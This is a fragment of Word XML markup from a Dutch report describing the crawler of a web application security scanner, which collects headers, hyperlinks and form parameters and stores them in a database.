                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21760"/>
                    <wp:lineTo x="21600" y="21760"/>
                    <wp:lineTo x="21600" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="177" name="Rectangle 177"/>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0B040" id="Rectangle 177" o:spid="_x0000_s1026" style="position:absolute;margin-left:258.75pt;margin-top:266.05pt;width:90pt;height:135pt;z-index:2526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6944" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="12931184" wp14:editId="0D54B346">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3855085</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3611880</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1143000" cy="1714500"/>
                <wp:effectExtent l="0" t="0" r="25400" b="38100"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21760"/>
                    <wp:lineTo x="21600" y="21760"/>
                    <wp:lineTo x="21600" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="179" name="Rectangle 179"/>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1E517" id="Rectangle 179" o:spid="_x0000_s1026" style="position:absolute;margin-left:303.55pt;margin-top:284.4pt;width:90pt;height:135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" fillcolor="#ffe599 [1303]" strokecolor="#1f3763 [1604]" strokeweight="1pt">
                <w10:wrap type="through"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00035EF5">
        <w:t>De c</w:t>
      </w:r>
      <w:r w:rsidR="00470AEB">
        <w:t>awler behoort tot</w:t>
      </w:r>
      <w:r w:rsidR="00CA05E0">
        <w:t xml:space="preserve"> één van</w:t>
      </w:r>
      <w:r w:rsidR="00470AEB">
        <w:t xml:space="preserve"> de kern componenten van een webapplicatie scanner en maakt deel uit van het projectstructuur.</w:t>
      </w:r>
      <w:r w:rsidR="000107FE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00470AEB">
        <w:t>De t</w:t>
      </w:r>
      <w:r w:rsidR="008A3737">
        <w:t>erm “c</w:t>
      </w:r>
      <w:r w:rsidR="00470AEB">
        <w:t>rawling” is synoniem worden met de activiteit waarbij data van een website prog</w:t>
      </w:r>
      <w:r w:rsidR="008A3737">
        <w:t>rammatisch wordt verkregen. De c</w:t>
      </w:r>
      <w:r w:rsidR="00470AEB">
        <w:t xml:space="preserve">rawler voorziet de webapplicatie scanner van informatie over de website, dit maakt deze component een essentieel onderdeel van het gehele systeem. Het is simpel om informatie te verkrijgen over een </w:t>
      </w:r>
      <w:r w:rsidR="00524641">
        <w:t>website, hiervoor dien je geen c</w:t>
      </w:r>
      <w:r w:rsidR="00470AEB">
        <w:t>rawler te implementeren, een simpele HTTP request is al genoeg om de content van een hele website en daarbij ook de headers te bemachtigen, dit wordt over het algemeen gedaan met een HTTP Cl</w:t>
      </w:r>
      <w:r w:rsidR="005A211D">
        <w:t>ient die bijna elke programmeer</w:t>
      </w:r>
      <w:r w:rsidR="00470AEB">
        <w:t>taal native bezit. Dit is voor een web</w:t>
      </w:r>
      <w:r w:rsidR="001F59FF">
        <w:t>applicatie scanner in praktisch</w:t>
      </w:r>
      <w:r w:rsidR="00470AEB">
        <w:t xml:space="preserve"> opzicht niet specifiek genoeg. Webapplicatie scanners verzamelen URL links waar zij s</w:t>
      </w:r>
      <w:r w:rsidR="003A431E">
        <w:t>pecifiek naar zoeken op een web</w:t>
      </w:r>
      <w:r w:rsidR="00470AEB">
        <w:t xml:space="preserve">pagina, en </w:t>
      </w:r>
      <w:r w:rsidR="00907195">
        <w:t>niet één web</w:t>
      </w:r>
      <w:r w:rsidR="00D45837">
        <w:t>pagina maar liever alle web</w:t>
      </w:r>
      <w:r w:rsidR="00470AEB">
        <w:t>pagina</w:t>
      </w:r>
      <w:r w:rsidR="00FF126C">
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00D45837">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00470AEB">
        <w:t xml:space="preserve"> van een gehele website, zover de Robot</w:t>
      </w:r>
      <w:r w:rsidR="00CF032A">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00470AEB">
        <w:t xml:space="preserve">.txt dat toelaat. </w:t>
      </w:r>
      <w:r w:rsidR="00D8719F">
        <w:t>De</w:t>
      </w:r>
      <w:r w:rsidR="00470AEB">
        <w:t xml:space="preserve"> webapplicatie</w:t>
      </w:r>
      <w:r w:rsidR="00D41524">
        <w:t xml:space="preserve"> scanner</w:t>
      </w:r>
      <w:r w:rsidR="00D8719F">
        <w:t xml:space="preserve"> heeft de URL’s</w:t>
      </w:r>
      <w:r w:rsidR="002B36EA">
        <w:t xml:space="preserve"> nodig om de gesimuleerde aanvallen</w:t>
      </w:r>
      <w:r w:rsidR="00470AEB">
        <w:t xml:space="preserve"> uit te voeren</w:t>
      </w:r>
      <w:r w:rsidR="00705BE8">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00FF126C">
        <w:t>Wat de c</w:t>
      </w:r>
      <w:r w:rsidR="00470AEB">
        <w:t>rawler vervolgens doet is de data opslaan in een</w:t>
      </w:r>
      <w:r w:rsidR="005041A4">
        <w:t xml:space="preserve"> database</w:t>
      </w:r>
      <w:r w:rsidR="00470AEB">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0248D387" w14:textId="77777777" w:rsidR="0018514B" w:rsidRDefault="0018514B" w:rsidP="001B3C7D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2256"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EE7A28E" w14:textId="77777777" w:rsidR="0018514B" w:rsidRDefault="0018514B" w:rsidP="001B3C7D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2256"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B099C4B" w14:textId="5DE61BD4" w:rsidR="00681EF4" w:rsidRPr="001B3C7D" w:rsidRDefault="00421E81" w:rsidP="001B3C7D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2256"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>Figuur 4.9</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Figuur 4.10</w:t>
      </w:r>
      <w:r w:rsidR="0034078F">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3CFFD9" w14:textId="0D410BE3" w:rsidR="0096760D" w:rsidRDefault="00446588" w:rsidP="00D84BAC">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2256"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252618752" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="750152AC" wp14:editId="0F021BFC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-900430</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-601980</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13112576"/>
                <wp:effectExtent l="0" t="0" r="38100" b="19685"/>
                <wp:wrapNone/>
                <wp:docPr id="63" name="Rectangle 63"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="317500" cy="13112576"/>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312E5" id="Rectangle 63" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.9pt;margin-top:-47.35pt;width:25pt;height:1032.5pt;z-index:-25069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NWnrQCAADv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" fillcolor="#ffd966 [1943]" strokecolor="#ffd966" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="509FE9CF" w14:textId="3D9B6366" w:rsidR="00D84BAC" w:rsidRDefault="00F42EC2" w:rsidP="00D84BAC">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2256"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F42EC2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Data dat verzamelt wordt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A97054" w14:textId="21435E84" w:rsidR="00785A8C" w:rsidRPr="00785A8C" w:rsidRDefault="003C57B7" w:rsidP="00D84BAC">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2256"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>De c</w:t>
      </w:r>
      <w:r w:rsidR="00636838">
        <w:t xml:space="preserve">rawler verzamelt de </w:t>
      </w:r>
      <w:r w:rsidR="00A07B17">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FA6C7D">
        <w:t>volgende data</w:t>
      </w:r>
      <w:r w:rsidR="00086ED5">
        <w:t xml:space="preserve"> van een website</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent4"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="1510" w:tblpY="-32"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2835"/>
        <w:gridCol w:w="2835"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C07507" w:rsidRPr="00345CBE" w14:paraId="2B9FDDEC" w14:textId="24E136C4" w:rsidTr="0032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C0DD19" w14:textId="7F0D2776" w:rsidR="00C07507" w:rsidRPr="00345CBE" w:rsidRDefault="00C07507" w:rsidP="006247B0">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2256"/>
              </w:tabs>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>Data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6EFEB0C0" w14:textId="3411C44B" w:rsidR="00C07507" w:rsidRDefault="00C07507" w:rsidP="006247B0">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2256"/>
              </w:tabs>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>Omschrijving</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C07507" w:rsidRPr="00345CBE" w14:paraId="491C3128" w14:textId="45E7CF12" w:rsidTr="00320C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5" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A66E998" w14:textId="77777777" w:rsidR="00C07507" w:rsidRPr="00345CBE" w:rsidRDefault="00C07507" w:rsidP="006247B0">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2256"/>
              </w:tabs>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00345CBE">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>Headers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68FFD003" w14:textId="4026B095"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Website configuratie</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C07507" w:rsidRPr="00345CBE" w14:paraId="7318E5C1" w14:textId="38DBE133" w:rsidTr="00320C10">
        <w:trPr>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01A6B275" w14:textId="1A873915" w:rsidR="00C07507" w:rsidRPr="00345CBE" w:rsidRDefault="00C07507" w:rsidP="006247B0">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2256"/>
              </w:tabs>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>Hyperl</w:t>
            </w:r>
            <w:r w:rsidRPr="00345CBE">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>inks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="665B40C2" w14:textId="7DDEB0D1" w:rsidR="00C07507" w:rsidRPr="00345CBE" w:rsidRDefault="00C07507" w:rsidP="006247B0">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2256"/>
              </w:tabs>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>Hyperlinks op de website</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C07507" w:rsidRPr="00345CBE" w14:paraId="530F6CD9" w14:textId="55D04D82" w:rsidTr="00320C10">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489D3BE4" w14:textId="77777777" w:rsidR="00C07507" w:rsidRPr="00345CBE" w:rsidRDefault="00C07507" w:rsidP="006247B0">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2256"/>
              </w:tabs>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00345CBE">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>Parameters</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="333A57CF" w14:textId="7C06FF6E"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Parameters van een Hyperlink</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7276470F" w14:textId="1AC5CE44" w:rsidR="002D6A29" w:rsidRDefault="00586B42" w:rsidP="003E2704">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C91E301" w14:textId="3253715F" w:rsidR="002D6A29" w:rsidRDefault="002D6A29" w:rsidP="003E2704"/>
    <w:p w14:paraId="11EABB38" w14:textId="77777777" w:rsidR="00091C97" w:rsidRDefault="00091C97" w:rsidP="003E2704">
      <w:pPr>
        <w:contextualSpacing/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="747E429F" w14:textId="3EBC27DC" w:rsidR="00421E81" w:rsidRDefault="00421E81" w:rsidP="003E2704">
      <w:r>
        <w:t xml:space="preserve"> Tabel 4.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BE7E52" w14:textId="1D4F89FF" w:rsidR="002D6A29" w:rsidRDefault="00DC482B" w:rsidP="003E2704">
      <w:r>
        <w:t>Headers geven informatie vrij over wat voor soort website het is.</w:t>
      </w:r>
      <w:r w:rsidR="00E36409">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00695C80">
        <w:t xml:space="preserve">SecurityReport gebruikt </w:t>
      </w:r>
      <w:r w:rsidR="00E36409">
        <w:t>header</w:t>
      </w:r>
      <w:r w:rsidR="00695C80">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00E36409">
        <w:t xml:space="preserve"> om informatie over de website te krijgen. </w:t>
      </w:r>
      <w:r>
        <w:t>De informatie gebruikt SecurityReport</w:t>
      </w:r>
      <w:r w:rsidR="00C15CBE">
        <w:t xml:space="preserve"> om kwetsbaarheden te vinde</w:t>
      </w:r>
      <w:r w:rsidR="00B51A16">
        <w:t>n op gebied van misconfiguratie maar ook voor het verwerken van algemene informatie in het rapport</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00C15CBE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245171AE" w14:textId="0FD766AB" w:rsidR="00086ED5" w:rsidRDefault="00DC482B" w:rsidP="003E2704">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252615680" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1BC1FA59" wp14:editId="04E7EE49">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-6985</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>163195</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3618865" cy="1485900"/>
                <wp:effectExtent l="0" t="0" r="13335" b="38100"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="4" name="Text Box 4"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3618865" cy="14859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BCD7439" w14:textId="1B5E900A" w:rsidR="002A05E5" w:rsidRPr="00DC482B" w:rsidRDefault="002A05E5">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2A05E5" w:rsidRPr="00DC482B" w:rsidRDefault="002A05E5">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2A05E5" w:rsidRPr="00DC482B" w:rsidRDefault="002A05E5">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2A05E5" w:rsidRPr="00DC482B" w:rsidRDefault="002A05E5">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2A05E5" w:rsidRPr="00DC482B" w:rsidRDefault="002A05E5">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2A05E5" w:rsidRPr="00DC482B" w:rsidRDefault="002A05E5">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2A05E5" w:rsidRPr="00DC482B" w:rsidRDefault="002A05E5">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FA59" id="Text Box 4" o:spid="_x0000_s1118" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-.55pt;margin-top:12.85pt;width:284.95pt;height:117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" filled="f" strokecolor="#ffc100">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7BCD7439" w14:textId="1B5E900A" w:rsidR="002A05E5" w:rsidRPr="00DC482B" w:rsidRDefault="002A05E5">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2A05E5" w:rsidRPr="00DC482B" w:rsidRDefault="002A05E5">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2A05E5" w:rsidRPr="00DC482B" w:rsidRDefault="002A05E5">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2A05E5" w:rsidRPr="00DC482B" w:rsidRDefault="002A05E5">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2A05E5" w:rsidRPr="00DC482B" w:rsidRDefault="002A05E5">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2A05E5" w:rsidRPr="00DC482B" w:rsidRDefault="002A05E5">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2A05E5" w:rsidRPr="00DC482B" w:rsidRDefault="002A05E5">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2B9B4DA6" w14:textId="0F818313" w:rsidR="00FA6C7D" w:rsidRDefault="00FA6C7D" w:rsidP="003E2704"/>
    <w:p w14:paraId="6D225CC1" w14:textId="6DC4E166" w:rsidR="0069148D" w:rsidRDefault="0069148D" w:rsidP="003E2704"/>
    <w:p w14:paraId="19251845" w14:textId="55B7148B" w:rsidR="00B8261B" w:rsidRDefault="00B8261B" w:rsidP="003E2704"/>
    <w:p w14:paraId="1A2E9E67" w14:textId="528A3EAA" w:rsidR="00B8261B" w:rsidRDefault="00B8261B" w:rsidP="00681EF4">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20970145" w14:textId="77777777" w:rsidR="00863E52" w:rsidRDefault="00863E52" w:rsidP="00681EF4">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5351F7F7" w14:textId="77777777" w:rsidR="00421E81" w:rsidRDefault="00421E81" w:rsidP="00681EF4">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BDB6F84" w14:textId="0B6F1FA1" w:rsidR="00421E81" w:rsidRPr="00E3495D" w:rsidRDefault="00421E81" w:rsidP="00681EF4">
      <w:r w:rsidRPr="00E3495D">
        <w:t>Figuur 4.11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097F82C1" w14:textId="476B22F3" w:rsidR="00B8261B" w:rsidRPr="00470160" w:rsidRDefault="00DC482B" w:rsidP="00681EF4">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252614656" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5B2AC9CF" wp14:editId="72F64C89">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-7620</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>799465</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5845810" cy="381635"/>
                <wp:effectExtent l="0" t="0" r="21590" b="24765"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="220" name="Text Box 220"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5845810" cy="381635"/>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2214A2C7" w14:textId="142FD5D7" w:rsidR="002A05E5" w:rsidRPr="00086ED5" w:rsidRDefault="002A05E5">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 href=”</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2A05E5" w:rsidRDefault="002A0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C9CF" id="Text Box 220" o:spid="_x0000_s1119" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-.6pt;margin-top:62.95pt;width:460.3pt;height:30.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" filled="f" strokecolor="#ffc100">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="2214A2C7" w14:textId="142FD5D7" w:rsidR="002A05E5" w:rsidRPr="00086ED5" w:rsidRDefault="002A05E5">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 href=”</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2A05E5" w:rsidRDefault="002A05E5"/>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="001D72BF">
        <w:t>Hyperlinks zijn misschien wel het belangrijkste element van een w</w:t>
      </w:r>
      <w:r w:rsidR="002C126B">
        <w:t>ebsite geschreven in HTML. Een h</w:t>
      </w:r>
      <w:r w:rsidR="001D72BF">
        <w:t>yperlink wordt gebruikt voor de gesimuleerde</w:t>
      </w:r>
      <w:r w:rsidR="005A59A9">
        <w:t xml:space="preserve"> aanvallen van SecurityRapport. De anchor element bestaat uit een hyperlink en een parameter gekleurd in het oranje. </w:t>
      </w:r>
      <w:r w:rsidR="007466D5">
        <w:t xml:space="preserve">Deze twee elementen worden apart opgeslagen in hun eigen tabel </w:t>
      </w:r>
      <w:r w:rsidR="00E24401">
        <w:t>(zie database model in Bijlage</w:t>
      </w:r>
      <w:r w:rsidR="007466D5">
        <w:t xml:space="preserve">). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE36847" w14:textId="00F7510E" w:rsidR="00B06DCC" w:rsidRDefault="00E3495D" w:rsidP="00681EF4">
      <w:r>
        <w:t>Figuur 4.12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777E6F16" w14:textId="552BF8C6" w:rsidR="00E3495D" w:rsidRDefault="00E3495D">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252616704" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="32742852" wp14:editId="0C15BAD2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-14605</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>595630</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5399405" cy="1784350"/>
                <wp:effectExtent l="0" t="0" r="3619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399405" cy="178435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4F69644" w14:textId="4CE7DAB3" w:rsidR="002A05E5" w:rsidRPr="00125A63" w:rsidRDefault="002A05E5">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2A05E5" w:rsidRPr="00125A63" w:rsidRDefault="002A05E5">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2A05E5" w:rsidRPr="00125A63" w:rsidRDefault="002A05E5">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2A05E5" w:rsidRPr="00125A63" w:rsidRDefault="002A05E5">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2A05E5" w:rsidRPr="00125A63" w:rsidRDefault="002A05E5">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2852" id="Text Box 23" o:spid="_x0000_s1120" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-1.15pt;margin-top:46.9pt;width:425.15pt;height:140.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" filled="f" strokecolor="#ffc100">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="14F69644" w14:textId="4CE7DAB3" w:rsidR="002A05E5" w:rsidRPr="00125A63" w:rsidRDefault="002A05E5">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2A05E5" w:rsidRPr="00125A63" w:rsidRDefault="002A05E5">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2A05E5" w:rsidRPr="00125A63" w:rsidRDefault="002A05E5">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2A05E5" w:rsidRPr="00125A63" w:rsidRDefault="002A05E5">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2A05E5" w:rsidRPr="00125A63" w:rsidRDefault="002A05E5">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v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00391BA0">
        <w:t>Voor het form element geld</w:t>
      </w:r>
      <w:r w:rsidR="00D34053">
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00391BA0">
        <w:t xml:space="preserve"> hetzelfde als de anchor element</w:t>
      </w:r>
      <w:r w:rsidR="003827DD">
        <w:t>. D</w:t>
      </w:r>
      <w:r w:rsidR="00391BA0">
        <w:t>e hyperlink</w:t>
      </w:r>
      <w:r w:rsidR="005D778E">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00391BA0">
        <w:t xml:space="preserve"> en parameters worden verzameld en opgeslagen alleen is het form element anders opgebouwd dan een anchor element.</w:t>
      </w:r>
      <w:r w:rsidR="007A2244">
        <w:t xml:space="preserve"> Uit de “action” attribuut wordt de hyperlink gehaald, de parameters worden uit de name attribuut gehaald.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A593B38" w14:textId="35A9D9A4" w:rsidR="00E3495D" w:rsidRDefault="00E3495D">
      <w:pPr>
        <w:sectPr w:rsidR="00E3495D" w:rsidSect="0096760D">
          <w:headerReference w:type="default" r:id="rId65"/>
          <w:headerReference w:type="first" r:id="rId66"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="0" w:right="1418" w:bottom="0" w:left="1418" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:t>Figuur 4.13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF85D06" w14:textId="77777777" w:rsidR="00446588" w:rsidRDefault="00446588" w:rsidP="00251301">
